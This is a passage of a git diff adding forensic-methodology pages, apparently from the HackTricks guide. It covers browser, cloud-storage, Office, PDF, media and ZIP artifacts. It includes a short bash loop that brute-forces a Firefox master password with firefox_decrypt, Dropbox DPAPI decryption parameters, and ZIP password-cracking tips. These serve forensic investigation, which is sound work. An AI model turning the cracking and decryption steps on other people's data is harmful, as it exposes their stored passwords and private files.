page=".pyc.md" %} + +{% page-ref page="browser-artifacts.md" %} + +{% page-ref page="desofuscation-vbs-cscript.exe.md" %} + +{% page-ref page="local-cloud-storage.md" %} + +{% page-ref page="office-file-analysis.md" %} + +{% page-ref page="pdf-file-analysis.md" %} + +{% page-ref page="png-tricks.md" %} + +{% page-ref page="video-and-audio-file-analysis.md" %} + +{% page-ref page="zips-tricks.md" %} + + + diff --git a/forensics/basic-forensic-methodology/specific-software-file-type-tricks/browser-artifacts.md b/forensics/basic-forensic-methodology/specific-software-file-type-tricks/browser-artifacts.md new file mode 100644 index 00000000000..bf7d961a7b8 --- /dev/null +++ b/forensics/basic-forensic-methodology/specific-software-file-type-tricks/browser-artifacts.md @@ -0,0 +1,251 @@ +# Browser Artifacts + +## Browsers Artefacts + +When we talk about browser artefacts we talk about, navigation history, bookmarks, list of downloaded files, cache data…etc. + +These artefacts are files stored inside of specific folders in the operating system. + +Each browser stores its files in a different place than other browsers and they all have different names, but they all store \(most of the time\) the same type of data \(artefacts\). + +Let us take a look at the most common artefacts stored by browsers. + +* **Navigation History :** Contains data about the navigation history of the user. Can be used to track down if the user has visited some malicious sites for example +* **Autocomplete Data :** This is the data that the browser suggest based on what you search the most. Can be used in tandem with the navigation history to get more insight. +* **Bookmarks :** Self Explanatory. +* **Extensions and Addons :** Self Explanatory. +* **Cache :** When navigating websites, the browser creates all sorts of cache data \(images, javascript files…etc\) for many reasons. For example to speed loading time of websites. These cache files can be a great source of data during a forensic investigation. +* **Logins :** Self Explanatory. +* **Favicons :** They are the little icons found in tabs, urls, bookmarks and the such. They can be used as another source to get more information about the website or places the user visited. +* **Browser Sessions :** Self Explanatory. +* **Downloads :**Self Explanatory. +* **Form Data :** Anything typed inside forms is often times stored by the browser, so the next time the user enters something inside of a form the browser can suggest previously entered data. +* **Thumbnails :** Self Explanatory. + +## Firefox + +Firefox use to create the profiles folder in ~/_**.mozilla/firefox/**_ \(Linux\), in **/Users/$USER/Library/Application Support/Firefox/Profiles/** \(MacOS\), _**%userprofile%\AppData\Roaming\Mozilla\Firefox\Profiles\**_ \(Windows\)_**.**_ +Inside this folder, the file _**profiles.ini**_ should appear with the name\(s\) of the used profile\(s\). +Each profile has a "**Path**" variable with the name of the folder where it's data is going to be stored. The folder should be **present in the same directory where the** _**profiles.ini**_ **exist**. If it isn't, then, probably it was deleted. + +Inside the folder **of each profile** \(_~/.mozilla/firefox/<ProfileName>/_\) path you should be able to find the following interesting files: + +* _**places.sqlite**_ : History \(moz_\__places\), bookmarks \(moz\_bookmarks\), and downloads \(moz_\__annos\). In windows the tool [BrowsingHistoryView](https://www.nirsoft.net/utils/browsing_history_view.html) can be used to read the history inside _**places.sqlite**_. + * Query to dump history: `select datetime(lastvisitdate/1000000,'unixepoch') as visit_date, url, title, visit_count, visit_type FROM moz_places,moz_historyvisits WHERE moz_places.id = moz_historyvisits.place_id;` + * Note that the link type is a number that indicates: + * 1: User followed a link + * 2: User wrote the URL + * 3: User used a favorite + * 4: Loaded from Iframe + * 5: Accessed via HTTP redirect 301 + * 6: Accessed via HTTP redirect 302 + * 7: Downloaded file + * 8: User followed a link inside an Iframe + * Query to dump downloads: `SELECT datetime(lastModified/1000000,'unixepoch') AS down_date, content as File, url as URL FROM moz_places, moz_annos WHERE moz_places.id = moz_annos.place_id;` + * +* _**bookmarkbackups/**_ : Bookmarks backups +* _**formhistory.sqlite**_ : **Web form data** \(like emails\) +* _**handlers.json**_ : Protocol handlers \(like, which app is going to handle _mailto://_ protocol\) +* _**persdict.dat**_ : Words added to the dictionary +* _**addons.json**_ and _**extensions.sqlite**_ : Installed addons and extensions +* _**cookies.sqlite**_ : Contains **cookies.** [**MZCookiesView**](https://www.nirsoft.net/utils/mzcv.html) ****can be used in Windows to inspect this file. +* _**cache2/entries**_ or _**startupCache**_ : Cache data \(~350MB\). Tricks like **data carving** can also be used to obtain the files saved in the cache. [MozillaCacheView](https://www.nirsoft.net/utils/mozilla_cache_viewer.html) can be used to see the **files saved in the cache**. + + Information that can be obtained: + + * URL, fetch Count, Filename, Content type, FIle size, Last modified time, Last fetched time, Server Last Modified, Server Response + +* _**favicons.sqlite**_ : Favicons +* _**prefs.js**_ : Settings and Preferences +* _**downloads.sqlite**_ : Old downloads database \(now it's inside places.sqlite\) +* _**thumbnails/**_ : Thumbnails +* _**logins.json**_ : Encrypted usernames and passwords +* **Browser’s built-in anti-phishing:** `grep 'browser.safebrowsing' ~/Library/Application Support/Firefox/Profiles/*/prefs.js` + * Will return “safebrowsing.malware.enabled” and “phishing.enabled” as false if the safe search settings have been disabled +* _**key4.db**_ or _**key3.db**_ : Master key ? + +In order to try to decrypt the master password you can use [https://github.com/unode/firefox\_decrypt](https://github.com/unode/firefox_decrypt) +With the following script and call you can specify a password file to bruteforce: + +{% code title="brute.sh" %} +```bash +#!/bin/bash + +#./brute.sh top-passwords.txt 2>/dev/null | grep -A2 -B2 "chrome:" +passfile=$1 +while read pass; do + echo "Trying $pass" + echo "$pass" | python firefox_decrypt.py +done < $passfile +``` +{% endcode %} + +![](../../../.gitbook/assets/image%20%2873%29.png) + +## Google Chrome + +Google Chrome creates the profile inside the home of the user _**~/.config/google-chrome/**_ \(Linux\), in _**C:\Users\XXX\AppData\Local\Google\Chrome\User Data\**_ \(Windows\), or in _**/Users/$USER/Library/Application Support/Google/Chrome/**_ \(MacOS\). +Most of the information will be saved inside the _**Default/**_ or _**ChromeDefaultData/**_ folders inside the paths indicated before. Inside here you can find the following interesting files: + +* _**History**_ : URLs, downloads and even searched keywords. In Windows you can use the tool [ChromeHistoryView](https://www.nirsoft.net/utils/chrome_history_view.html) to read the history. The "Transition Type" column means: + * Link: User clicked on a link + * Typed: The url was written + * Auto Bookmark + * Auto Subframe: Add + * Start page: Home page + * Form Submit: A form was filled and sent + * Reloaded +* _**Cookies**_ : Cookies. [ChromeCookiesView](https://www.nirsoft.net/utils/chrome_cookies_view.html) can be used to inspect the cookies. +* _**Cache**_ : Cache. In Windows you can use the tool [ChromeCacheView](https://www.nirsoft.net/utils/chrome_cache_view.html) to inspect the ca +* _**Bookmarks**_ : **** Bookmarks +* _**Web Data**_ : Form History +* _**Favicons**_ : Favicons +* _**Login Data**_ : Login information \(usernames, passwords...\) +* _**Current Session**_ and _**Current Tabs**_ : Current session data and current tabs +* _**Last Session**_ and _**Last Tabs**_ : These files hold sites that were active in the browser when Chrome was last closed. +* _**Extensions/**_ : Extensions and addons folder +* **Thumbnails** : Thumbnails +* **Preferences**: This file contains a plethora of good information such as plugins, extensions, sites using geolocation, popups, notifications, DNS prefetching, certificate exceptions, and much more. If you’re trying to research whether or not a specific Chrome setting was enabled, you will likely find that setting in here. +* **Browser’s built-in anti-phishing:** `grep 'safebrowsing' ~/Library/Application Support/Google/Chrome/Default/Preferences` + * You can simply grep for “**safebrowsing**” and look for `{"enabled: true,"}` in the result to indicate anti-phishing and malware protection is on. + +## **SQLite DB Data Recovery** + +As you can observe in the previous sections, both Chrome and Firefox use **SQLite** databases to store the data. It's possible to **recover deleted entries using the tool** [**sqlparse**](https://github.com/padfoot999/sqlparse) **or** [**sqlparse\_gui**](https://github.com/mdegrazia/SQLite-Deleted-Records-Parser/releases). + +## **Internet Explorer 11** + +Internet Explorer stores **data** and **metadata** in different locations. The metadata will allow to find the data. + +The **metadata** can be found in the folder`%userprofile%\Appdata\Local\Microsoft\Windows\WebCache\WebcacheVX.data` where VX can be V01, V16 o V24. +In the previous folder you can also find the file V01.log. In case the **modified time** of this file and the WebcacheVX.data file **are different** you may need to run the command `esentutl /r V01 /d` to **fix** possible **incompatibilities**. + +Once **recovered** this artifact \(It's an ESE database, photorec can recover it with the options Exchange Database or EDB\) you can use the program [ESEDatabaseView](https://www.nirsoft.net/utils/ese_database_view.html) to open it. +Once **opened**, go to the table "**Containers**". + +![](../../../.gitbook/assets/image%20%28447%29.png) + +Inside this table you can find in which other tables or containers each part of the stored information is saved. Following that you can find the **locations of the data** stored by the browsers **and metadata** about that data inside the . + +**Note that this table indicate also metadadata of the cache of other Microsoft tools also \(e.g. skype\)** + +### Cache + +You can use the tool [IECacheView](https://www.nirsoft.net/utils/ie_cache_viewer.html) to inspect the cache. You need to indicate the folder where you have extracted the cache date. + +#### Metadata + +The metadata information about the cache stores: + +* Filename in the disc +* SecureDIrectory: Location of the file inside the cache directories +* AccessCount: Number of times it was saved in the cache +* URL:The url origin +* CreationTime: First time it was cached +* AccessedTime: Time when the cache was used +* ModifiedTime: Last webpage version +* ExpiryTime: Time when the cache will expire + +#### Files + +The cache information can be found in _**%userprofile%\Appdata\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5**_ and _**%userprofile%\Appdata\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\low**_ + +The information inside these folders is a **snapshot of what the user was seeing**. The caches has a size of **250 MB** and the timestamps indicate when the page was visited \(first time, creation date of the NTFS, last time, modification time of the NTFS\). + +### Cookies + +You can use the tool [IECookiesView](https://www.nirsoft.net/utils/iecookies.html) to inspect the cookies. You need to indicate the folder where you have extracted the cookies. + +#### **Metadata** + +The metadata information about the cookies stores: + +* Cookie name in the filesystem +* URL +* AccessCount: Number of times the cookies has been sent to terhe serv +* CreationTime: First time the cookie was created +* ModifiedTime: Last time the cookie was modifued +* AccessedTime: Last time the cookie was accesed +* ExpiryTime: Time of expiration of the cookie + +#### Files + +The cookies data can be found in _**%userprofile%\Appdata\Roaming\Microsoft\Windows\Cookies**_ and _**%userprofile%\Appdata\Roaming\Microsoft\Windows\Cookies\low**_ + +Session cookies will reside in memory and persistent cookie in the disk. + +### Downloads + +#### **Metadata** + +Checking the tool [ESEDatabaseView](https://www.nirsoft.net/utils/ese_database_view.html) you can find the container with the metadata of the downloads: + +![](../../../.gitbook/assets/image%20%28445%29.png) + +Getting the information of the column "ResponseHeaders" you can transform from hex that information and obtain the URL, the file type and the location of the downloaded file. + +#### Files + +Look in the path _**%userprofile%\Appdata\Roaming\Microsoft\Windows\IEDownloadHistory**_ + +### **History** + +The tool [BrowsingHistoryView](https://www.nirsoft.net/utils/browsing_history_view.html) can be used to read the history. But first you need to indicate the browser in advanced options and the location of the extracted history files. + +#### **Metadata** + +* ModifiedTime: First time a URL is found +* AccessedTime: Last time +* AccessCount: Number of times accessed + +#### **Files** + +Search in _**userprofile%\Appdata\Local\Microsoft\Windows\History\History.IE5**_ and _**userprofile%\Appdata\Local\Microsoft\Windows\History\Low\History.IE5**_ + +### **Typed URLs** + +This information can be found inside the registry NTDUSER.DAT in the path: + +* _**Software\Microsoft\InternetExplorer\TypedURLs**_ + * Stores the last 50 URLs typed by the user +* _**Software\Microsoft\InternetExplorer\TypedURLsTime**_ + * last time the URL was typed + +## Microsoft Edge + +For analyzing Microsoft Edge artifacts all the **explanations about cache and locations from the previous section \(IE 11\) remain valid** with the only difference that the base locating in this case is _**%userprofile%\Appdata\Local\Packages**_ \(as can be observed in the following paths\): + +* Profile Path: _**C:\Users\XX\AppData\Local\Packages\Microsoft.MicrosoftEdge\_XXX\AC**_ +* History, Cookies and Downloads: _**C:\Users\XX\AppData\Local\Microsoft\Windows\WebCache\WebCacheV01.dat**_ +* Settings, Bookmarks, and Reading List: _**C:\Users\XX\AppData\Local\Packages\Microsoft.MicrosoftEdge\_XXX\AC\MicrosoftEdge\User\Default\DataStore\Data\nouser1\XXX\DBStore\spartan.edb**_ +* Cache: _**C:\Users\XXX\AppData\Local\Packages\Microsoft.MicrosoftEdge\_XXX\AC\#!XXX\MicrosoftEdge\Cache**_ +* Last active sessions: _**C:\Users\XX\AppData\Local\Packages\Microsoft.MicrosoftEdge\_XXX\AC\MicrosoftEdge\User\Default\Recovery\Active**_ + +## **Safari** + +The databases can be found in `/Users/$User/Library/Safari` + +* **History.db**: The tables `history_visits` _and_ `history_items` contains information about the history and timestamps. + * `sqlite3 ~/Library/Safari/History.db "SELECT h.visit_time, i.url FROM history_visits h INNER JOIN history_items i ON h.history_item = i.id"` +* **Downloads.plist**: Contains the info about the downloaded files. +* **Book-marks.plis**t: URLs bookmarked. +* **TopSites.plist**: List of the most visited websites that the user browses to. +* **Extensions.plist**: To retrieve an old-style list of Safari browser extensions. + * `plutil -p ~/Library/Safari/Extensions/Extensions.plist| grep "Bundle Directory Name" | sort --ignore-case` + * `pluginkit -mDvvv -p com.apple.Safari.extension` +* **UserNotificationPermissions.plist**: Domains that are allowed to push notifications. + * `plutil -p ~/Library/Safari/UserNotificationPermissions.plist | grep -a3 '"Permission" => 1'` +* **LastSession.plist**: Tabs that were opened the last time the user exited Safari. + * `plutil -p ~/Library/Safari/LastSession.plist | grep -iv sessionstate` +* **Browser’s built-in anti-phishing:** `defaults read com.apple.Safari WarnAboutFraudulentWebsites` + * The reply should be 1 to indicate the setting is active + +## Opera + +The databases can be found in `/Users/$USER/Library/Application Support/com.operasoftware.Opera` + +Opera **stores browser history and download data in the exact same format as Google Chrome**. This applies to the file names as well as the table names. + +* **Browser’s built-in anti-phishing:** `grep --color 'fraud_protection_enabled' ~/Library/Application Support/com.operasoftware.Opera/Preferences` + * **fraud\_protection\_enabled** should be **true** + diff --git a/forensics/basic-forensic-methodology/specific-software-file-type-tricks/desofuscation-vbs-cscript.exe.md b/forensics/basic-forensic-methodology/specific-software-file-type-tricks/desofuscation-vbs-cscript.exe.md new file mode 100644 index 00000000000..67c232f4a8d --- /dev/null +++ b/forensics/basic-forensic-methodology/specific-software-file-type-tricks/desofuscation-vbs-cscript.exe.md @@ -0,0 +1,49 @@ +# Desofuscation vbs \(cscript.exe\) + +Some things that could be useful to debug/desofuscate a malicious vbs file: + +### echo + +```bash +Wscript.Echo "Like this?" +``` + +### Commnets + +```text +' this is a comment +``` + +### Test + +```text +cscript.exe file.vbs +``` + +### Write data to a file + +```aspnet +Function writeBinary(strBinary, strPath) + + Dim oFSO: Set oFSO = CreateObject("Scripting.FileSystemObject") + + ' below lines pupose: checks that write access is possible! + Dim oTxtStream + + On Error Resume Next + Set oTxtStream = oFSO.createTextFile(strPath) + + If Err.number <> 0 Then MsgBox(Err.message) : Exit Function + On Error GoTo 0 + + Set oTxtStream = Nothing + ' end check of write access + + With oFSO.createTextFile(strPath) + .Write(strBinary) + .Close + End With + +End Function +``` + diff --git a/forensics/basic-forensic-methodology/specific-software-file-type-tricks/local-cloud-storage.md b/forensics/basic-forensic-methodology/specific-software-file-type-tricks/local-cloud-storage.md new file mode 100644 index 00000000000..30f79139c11 --- /dev/null +++ b/forensics/basic-forensic-methodology/specific-software-file-type-tricks/local-cloud-storage.md @@ -0,0 +1,98 @@ +# Local Cloud Storage + +## OneDrive + +In Windows you can find the OneDrive folder in `\Users\\AppData\Local\Microsoft\OneDrive` +And inside `logs\Personal` it's possible to find the file `SyncDiagnostics.log` which contains some interesting data regarding the synchronized files: + +* Size in bytes +* Creation date +* Modification date +* Number of files in the cloud +* Number of files in the folder +* **CID**: Unique ID of the OneDrive user +* Report generation time +* Size of the HD of the OS + +Once you have found the CID it's recommended to **search files containing this ID**. You may be able to find files with the name: _**<CID>.ini**_ and _**<CID>.dat**_ that may contain interesting information like the names of files syncronized with OneDrive. + +## Google Drive + +In Widows you can find the main Google Drive folder in `\Users\\AppData\Local\Google\Drive\user_default` +This folder contains a file called Sync\_log.log with information like the email address of the account, filenames, timestamps, MD5 hashes of the files... +Even deleted files appears in that log file with it's corresponding MD5. + +The file **`Cloud_graph\Cloud_graph.db`** is a sqlite database which contains the table **`cloud_graph_entry`** +In this table you can find: the **name** of the **synchronized** **files**, modified time, size, MD5 checksum of the files. + +The table data of the database **`Sync_config.db`** contains the email address of the account, path of the shared folders and Google Drive version. + +## Dropbox + +Dropbox uses **SQLite databases** to mange the files. In this +You can find the databases in the folders: + +* `\Users\\AppData\Local\Dropbox` +* `\Users\\AppData\Local\Dropbox\Instance1` +* `\Users\\AppData\Roaming\Dropbox` + +And the main databases are: + +* Sigstore.dbx +* Filecache.dbx +* Deleted.dbx +* Config.dbx + +The ".dbx" extension means that the **databases** are **encrypted**. Dropbox uses **DPAPI** \([https://docs.microsoft.com/en-us/previous-versions/ms995355\(v=msdn.10\)?redirectedfrom=MSDN](https://docs.microsoft.com/en-us/previous-versions/ms995355%28v=msdn.10%29?redirectedfrom=MSDN)\) + +In order to understand better the encryption that Dropbox uses you can read [https://blog.digital-forensics.it/2017/04/brush-up-on-dropbox-dbx-decryption.html](https://blog.digital-forensics.it/2017/04/brush-up-on-dropbox-dbx-decryption.html). + +However, the main information is: + +* **Entropy**: d114a55212655f74bd772e37e64aee9b +* **Salt**: 0D638C092E8B82FC452883F95F355B8E +* **Algorithm**: PBKDF2 +* **Iterations**: 1066 + +Apart from that information, in order to decrypt the databases you still need: + +* The **encrypted DPAPI key**: You can find it in the registry inside `NTUSER.DAT\Software\Dropbox\ks\client` \(export this data as binary\) +* The **`SYSTEM`** and **`SECURITY`** hives +* The **DPAPI master keys**: Which can be found in `\Users\\AppData\Roaming\Microsoft\Protect` +* The **username** and **password** of the Windows user + +Then you can use the tool [**DataProtectionDecryptor**](https://nirsoft.net/utils/dpapi_data_decryptor.html)**:** + +![](../../../.gitbook/assets/image%20%28448%29.png) + +If everything goes as expected, the tool will indicate the **primary key** that you need to **use to recover the original one**. To recover the original one, just use this [cyber\_chef receipt](https://gchq.github.io/CyberChef/#recipe=Derive_PBKDF2_key%28%7B'option':'Hex','string':'98FD6A76ECB87DE8DAB4623123402167'%7D,128,1066,'SHA1',%7B'option':'Hex','string':'0D638C092E8B82FC452883F95F355B8E'%7D%29) putting the primary key as the "passphrase" inside the receipt. + +The resulting hex is the final key used to encrypt the databases which can be decrypted with: + +```bash +sqlite -k config.dbx ".backup config.db" #This decompress the config.dbx and creates a clear text backup in config.db +``` + +The **`config.dbx`** database contains: + +* **Email**: The email of the user +* **usernamedisplayname**: The name of the user +* **dropbox\_path**: Path where the dropbox folder is located +* **Host\_id: Hash** used to authenticate to the cloud. This can only be revoked from the web. +* **Root\_ns**: User identifier + +The **`filecache.db`** database contains information about all the files and folders synchronized with Dropbox. The table `File_journal` is the one with more useful information: + +* **Server\_path**: Path where the file is located inside the server \(this path is preceded by the `host_id` of the client\) . +* **local\_sjid**: Version of the file +* **local\_mtime**: Modification date +* **local\_ctime**: Creation date + +Other tables inside this database contain more interesting information: + +* **block\_cache**: hash of all the files and folder of Dropbox +* **block\_ref**: Related the hash ID of the table `block_cache` with the file ID in the table `file_journal` +* **mount\_table**: Share folders of dropbox +* **deleted\_fields**: Dropbox deleted files +* **date\_added** + diff --git a/forensics/basic-forensic-methodology/specific-software-file-type-tricks/office-file-analysis.md b/forensics/basic-forensic-methodology/specific-software-file-type-tricks/office-file-analysis.md new file mode 100644 index 00000000000..04342b6beaa --- /dev/null +++ b/forensics/basic-forensic-methodology/specific-software-file-type-tricks/office-file-analysis.md @@ -0,0 +1,74 @@ +# Office file analysis + +## Introduction + +Microsoft has created **dozens of office document file formats**, many of which are popular for the distribution of phishing attacks and malware because of their ability to **include macros** \(VBA scripts\). + +Broadly speaking, there are two generations of Office file format: the **OLE formats** \(file extensions like RTF, DOC, XLS, PPT\), and the "**Office Open XML**" formats \(file extensions that include DOCX, XLSX, PPTX\). **Both** formats are structured, compound file binary formats that **enable Linked or Embedded content** \(Objects\). OOXML files are actually zip file containers, meaning that one of the easiest ways to check for hidden data is to simply `unzip` the document: + +```text +$ unzip example.docx +Archive: example.docx + inflating: [Content_Types].xml + inflating: _rels/.rels + inflating: word/_rels/document.xml.rels + inflating: word/document.xml + inflating: word/theme/theme1.xml + extracting: docProps/thumbnail.jpeg + inflating: word/comments.xml + inflating: word/settings.xml + inflating: word/fontTable.xml + inflating: word/styles.xml + inflating: word/stylesWithEffects.xml + inflating: docProps/app.xml + inflating: docProps/core.xml + inflating: word/webSettings.xml + inflating: word/numbering.xml +$ tree +. +├── [Content_Types].xml +├── _rels +├── docProps +│ ├── app.xml +│ ├── core.xml +│ └── thumbnail.jpeg +└── word + ├── _rels + │ └── document.xml.rels + ├── comments.xml + ├── document.xml + ├── fontTable.xml + ├── numbering.xml + ├── settings.xml + ├── styles.xml + ├── stylesWithEffects.xml + ├── theme + │ └── theme1.xml + └── webSettings.xml +``` + +As you can see, some of the structure is created by the file and folder hierarchy. The rest is specified inside the XML files. [_New Steganographic Techniques for the OOXML File Format_, 2011](http://download.springer.com/static/pdf/713/chp%253A10.1007%252F978-3-642-23300-5_27.pdf?originUrl=http%3A%2F%2Flink.springer.com%2Fchapter%2F10.1007%2F978-3-642-23300-5_27&token2=exp=1497911340~acl=%2Fstatic%2Fpdf%2F713%2Fchp%25253A10.1007%25252F978-3-642-23300-5_27.pdf%3ForiginUrl%3Dhttp%253A%252F%252Flink.springer.com%252Fchapter%252F10.1007%252F978-3-642-23300-5_27*~hmac=aca7e2655354b656ca7d699e8e68ceb19a95bcf64e1ac67354d8bca04146fd3d) details some ideas for data hiding techniques, but CTF challenge authors will always be coming up with new ones. + +Once again, a Python toolset exists for the examination and **analysis of OLE and OOXML documents**: [oletools](http://www.decalage.info/python/oletools). For OOXML documents in particular, [OfficeDissector](https://www.officedissector.com/) is a very powerful analysis framework \(and Python library\). The latter includes a [quick guide to its usage](https://github.com/grierforensics/officedissector/blob/master/doc/html/_sources/txt/ANALYZING_OOXML.txt). + +Sometimes the challenge is not to find hidden static data, but to **analyze a VBA macro** to determine its behavior. This is a more realistic scenario, and one that analysts in the field perform every day. The aforementioned dissector tools can indicate whether a macro is present, and probably extract it for you. A typical VBA macro in an Office document, on Windows, will download a PowerShell script to %TEMP% and attempt to execute it, in which case you now have a PowerShell script analysis task too. But malicious VBA macros are rarely complicated, since VBA is [typically just used as a jumping-off platform to bootstrap code execution](https://www.lastline.com/labsblog/party-like-its-1999-comeback-of-vba-malware-downloaders-part-3/). In the case where you do need to understand a complicated VBA macro, or if the macro is obfuscated and has an unpacker routine, you don't need to own a license to Microsoft Office to debug this. You can use [Libre Office](http://libreoffice.org/): [its interface](http://www.debugpoint.com/2014/09/debugging-libreoffice-macro-basic-using-breakpoint-and-watch/) will be familiar to anyone who has debugged a program; you can set breakpoints and create watch variables and capture values after they have been unpacked but before whatever payload behavior has executed. You can even start a macro of a specific document from a command line: + +```text +$ soffice path/to/test.docx macro://./standard.module1.mymacro +``` + +## [oletools](https://github.com/decalage2/oletools) + +```bash +sudo pip3 install -U oletools +olevba -c /path/to/document #Extract macros +``` + +## Automatic Execution + +Macro functions like `AutoOpen`, `AutoExec` or `Document_Open` will be **automatically** **executed**. + +## References + +* [https://trailofbits.github.io/ctf/forensics/](https://trailofbits.github.io/ctf/forensics/) + diff --git a/forensics/basic-forensic-methodology/specific-software-file-type-tricks/pdf-file-analysis.md b/forensics/basic-forensic-methodology/specific-software-file-type-tricks/pdf-file-analysis.md new file mode 100644 index 00000000000..aff6968f510 --- /dev/null +++ b/forensics/basic-forensic-methodology/specific-software-file-type-tricks/pdf-file-analysis.md @@ -0,0 +1,24 @@ +# PDF File analysis + +From: [https://trailofbits.github.io/ctf/forensics/](https://trailofbits.github.io/ctf/forensics/) + +PDF is an extremely complicated document file format, with enough tricks and hiding places [to write about for years](https://www.sultanik.com/pocorgtfo/). This also makes it popular for CTF forensics challenges. The NSA wrote a guide to these hiding places in 2008 titled "Hidden Data and Metadata in Adobe PDF Files: Publication Risks and Countermeasures." It's no longer available at its original URL, but you can [find a copy here](http://www.itsecure.hu/library/file/Biztons%C3%A1gi%20%C3%BAtmutat%C3%B3k/Alkalmaz%C3%A1sok/Hidden%20Data%20and%20Metadata%20in%20Adobe%20PDF%20Files.pdf). Ange Albertini also keeps a wiki on GitHub of [PDF file format tricks](https://github.com/corkami/docs/blob/master/PDF/PDF.md). + +The PDF format is partially plain-text, like HTML, but with many binary "objects" in the contents. Didier Stevens has written [good introductory material](https://blog.didierstevens.com/2008/04/09/quickpost-about-the-physical-and-logical-structure-of-pdf-files/) about the format. The binary objects can be compressed or even encrypted data, and include content in scripting languages like JavaScript or Flash. To display the structure of a PDF, you can either browse it with a text editor, or open it with a PDF-aware file-format editor like Origami. + +[qpdf](https://github.com/qpdf/qpdf) is one tool that can be useful for exploring a PDF and transforming or extracting information from it. Another is a framework in Ruby called [Origami](https://github.com/mobmewireless/origami-pdf). + +When exploring PDF content for hidden data, some of the hiding places to check include: + +* non-visible layers +* Adobe's metadata format "XMP" +* the "incremental generation" feature of PDF wherein a previous version is retained but not visible to the user +* white text on a white background +* text behind images +* an image behind an overlapping image +* non-displayed comments + +There are also several Python packages for working with the PDF file format, like [PeepDF](https://github.com/jesparza/peepdf), that enable you to write your own parsing scripts. + + + diff --git a/forensics/basic-forensic-methodology/specific-software-file-type-tricks/png-tricks.md b/forensics/basic-forensic-methodology/specific-software-file-type-tricks/png-tricks.md new file mode 100644 index 00000000000..1e84b518967 --- /dev/null +++ b/forensics/basic-forensic-methodology/specific-software-file-type-tricks/png-tricks.md @@ -0,0 +1,6 @@ +# PNG tricks + +PNG files, in particular, are popular in CTF challenges, probably for their lossless compression suitable for hiding non-visual data in the image. PNG files can be dissected in Wireshark. To verify correcteness or attempt to repair corrupted PNGs you can use [pngcheck](http://libpng.org/pub/png/apps/pngcheck.html) + +You can try to repair corrupted PNGs using online tools like: [https://online.officerecovery.com/pixrecovery/](https://online.officerecovery.com/pixrecovery/) + diff --git a/forensics/basic-forensic-methodology/specific-software-file-type-tricks/video-and-audio-file-analysis.md b/forensics/basic-forensic-methodology/specific-software-file-type-tricks/video-and-audio-file-analysis.md new file mode 100644 index 00000000000..2193436da5a --- /dev/null +++ b/forensics/basic-forensic-methodology/specific-software-file-type-tricks/video-and-audio-file-analysis.md @@ -0,0 +1,14 @@ +# Video and Audio file analysis + +From: [https://trailofbits.github.io/ctf/forensics/](https://trailofbits.github.io/ctf/forensics/) + +Like image file formats, audio and video file trickery is a common theme in CTF forensics challenges not because hacking or data hiding ever happens this way in the real world, but just because audio and video is fun. As with image file formats, stegonagraphy might be used to embed a secret message in the content data, and again you should know to check the file metadata areas for clues. Your first step should be to take a look with the [mediainfo](https://mediaarea.net/en/MediaInfo) tool \(or `exiftool`\) and identify the content type and look at its metadata. + +[Audacity](http://www.audacityteam.org/) is the premiere open-source audio file and waveform-viewing tool, and CTF challenge authors love to encode text into audio waveforms, which you can see using the spectogram view \(although a specialized tool called [Sonic Visualiser](http://www.sonicvisualiser.org/) is better for this task in particular\). Audacity can also enable you to slow down, reverse, and do other manipulations that might reveal a hidden message if you suspect there is one \(if you can hear garbled audio, interference, or static\). [Sox](http://sox.sourceforge.net/) is another useful command-line tool for converting and manipulating audio files. + +It's also common to check least-significant-bits \(LSB\) for a secret message. Most audio and video media formats use discrete \(fixed-size\) "chunks" so that they can be streamed; the LSBs of those chunks are a common place to smuggle some data without visibly affecting the file. + +Other times, a message might be encoded into the audio as [DTMF tones](http://dialabc.com/sound/detect/index.html) or morse code. For these, try working with [multimon-ng](http://tools.kali.org/wireless-attacks/multimon-ng) to decode them. + +Video file formats are really container formats, that contain separate streams of both audio and video that are multiplexed together for playback. For analyzing and manipulating video file formats, [ffmpeg](http://ffmpeg.org/) is recommended. `ffmpeg -i` gives initial analysis of the file content. It can also de-multiplex or playback the content streams. The power of ffmpeg is exposed to Python using [ffmpy](http://ffmpy.readthedocs.io/en/latest/examples.html). + diff --git a/forensics/basic-forensic-methodology/specific-software-file-type-tricks/zips-tricks.md b/forensics/basic-forensic-methodology/specific-software-file-type-tricks/zips-tricks.md new file mode 100644 index 00000000000..8f65172156c --- /dev/null +++ b/forensics/basic-forensic-methodology/specific-software-file-type-tricks/zips-tricks.md @@ -0,0 +1,18 @@ +# ZIPs tricks + +There are a handful of command-line tools for zip files that will be useful to know about. + +* `unzip` will often output helpful information on why a zip will not decompress. +* `zipdetails -v` will provide in-depth information on the values present in the various fields of the format. +* `zipinfo` lists information about the zip file's contents, without extracting it. +* `zip -F input.zip --out output.zip` and `zip -FF input.zip --out output.zip` attempt to repair a corrupted zip file. +* [fcrackzip](https://github.com/hyc/fcrackzip) brute-force guesses a zip password \(for passwords <7 characters or so\). + +[Zip file format specification](https://pkware.cachefly.net/webdocs/casestudies/APPNOTE.TXT) + +One important security-related note about password-protected zip files is that they do not encrypt the filenames and original file sizes of the compressed files they contain, unlike password-protected RAR or 7z files. + +Another note about zip cracking is that if you have an unencrypted/uncompressed copy of any one of the files that is compressed in the encrypted zip, you can perform a "plaintext attack" and crack the zip, as [detailed here](https://www.hackthis.co.uk/articles/known-plaintext-attack-cracking-zip-files), and explained in [this paper](https://www.cs.auckland.ac.nz/~mike/zipattacks.pdf). The newer scheme for password-protecting zip files \(with AES-256, rather than "ZipCrypto"\) does not have this weakness. + +From: [https://app.gitbook.com/@cpol/s/hacktricks/~/edit/drafts/-LlM5mCby8ex5pOeV4pJ/forensics/basic-forensics-esp/zips-tricks](https://app.gitbook.com/@cpol/s/hacktricks/~/edit/drafts/-LlM5mCby8ex5pOeV4pJ/forensics/basic-forensics-esp/zips-tricks) + diff --git a/forensics/basic-forensic-methodology/windows-forensics/README.md b/forensics/basic-forensic-methodology/windows-forensics/README.md new file mode 100644 index 00000000000..c3c0bf2515e --- /dev/null +++ b/forensics/basic-forensic-methodology/windows-forensics/README.md @@ -0,0 +1,488 @@ +# Windows Artifacts + +## Generic Windows Artifacts + +### Windows 10 Notifications + +In the path `\Users\\AppData\Local\Microsoft\Windows\Notifications` you can find the database `appdb.dat` \(before Windows anniversary\) or `wpndatabase.db` \(after Windows Anniversary\). + +Inside this SQLite database you can find the `Notification` table with all the notifications \(in xml format\) that may contain interesting data. + +### Timeline + +Timeline is a Windows characteristic that provides **chronological history** of web pages visited, edited documents, executed applications... +The database resides in the path 